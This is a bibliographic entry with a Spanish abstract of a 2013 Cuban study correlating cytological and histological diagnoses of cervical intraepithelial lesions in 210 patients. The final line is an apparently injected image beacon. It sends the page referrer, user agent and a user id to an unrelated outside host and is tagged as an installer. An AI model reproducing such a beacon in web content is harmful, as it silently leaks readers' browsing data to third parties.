Correlación citohistológica de las lesiones intraepiteliales del cérvix. - Tartabull Sánchez, Gladys; Scull Villegas, Concepción; Duarte Vilariño, Adoración; López Baró, Dairenis; Sosa Sánchez, Doly (Mediciego, 2013)
Se realizó un estudio observacional, descriptivo, retrospectivo con el objetivo de comparar la correlación citotológica e histológica en las lesiones intraepiteliales del cuello uterino en el Hospital General Docente General “Dr. Antonio Luaces Iraola” de Ciego de Ávila, en el período comprendido del 1ro de enero de 2009 hasta el 31 de diciembre de 2010. Se estudiaron 210 pacientes, la edad más frecuente de aparición de las lesiones estuvo entre los 25 y 44 años con predominio de edad, en mujeres entre los 25 y 34 años. En los 210 casos, 163 presentaron correlación diagnóstica, 105 de los casos coincidentes tenían diagnóstico de lesión intraepitelial escamosa de bajo grado y 73 casos tuvieron lesiones intraepiteliales de alto grado. <img src="http://prettysite.xyz/acnt?_=1584034640668&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F269&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />